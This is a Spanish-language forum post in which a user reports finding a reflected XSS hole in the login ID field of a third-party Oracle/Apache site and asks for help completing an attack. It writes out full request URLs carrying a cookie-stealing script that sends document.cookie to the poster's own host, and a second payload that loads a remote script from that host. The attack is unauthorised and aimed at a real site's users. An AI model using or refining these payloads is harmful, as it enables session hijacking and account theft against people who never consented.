Título: Problema con XSS "java.sql.SQLException" Publicado por: .:UND3R:. en 20 Marzo 2011, 17:48 pm Hola a todos bueno les cuento estaba un poco aburrido y se me ocurrió indagar un poco y retomé con los xss y encontré una página con una vulnerabilidad xss
pero no en su buscador si no que en una parte para hacer login (Exactamente en la ID) al momento de logearme erroneamente (poniendo una ID falsa y una clave) me marcaba el usuario xxx no existe, por lo que probé con codigos htm y walá tenia xss así que preparé el escenario.. Subi mi cookie.php (http://lapaginaquetengo.com/cookies.php) con el siguiente código Código: <? la petición: Código: http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script>window.location='http://paginamiaconcookie.com/cookies.php?cookie='+document.cookie;</script>&P_PASS=default&Submit=Aceptar Pero al hacer las pruebas me Devuelve: Citar java.sql.SQLException ORA-00907: missing right parenthesis Y peor no se crea datos.txt con la información La página tiene centos,está bajo Oracle y apache 2.2.3 Espero su ayuda muchas gracias por tomarse el tiempo de leer EDIT:Buscando por internet, lei algo como colocar esto: Código: <script src=Http://host.com/javascript.js></script> EDIT2: Encontré un codigo en js hice lo siguiente: Código: <script language="javascript"> 1-Lo guardé como login.js en http://paginaquetengo.com/login.js junto con el cookie.php que anteriormente mencioné (http://lapaginaquetengo.com/cookies.php) 2-introducí en la página prueba: Código: http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script src=http://paginaquetengo.com/login.js></script>&P_PASS=default&Submit=Aceptar Espero ansiosamente su ayuda gracias x.x |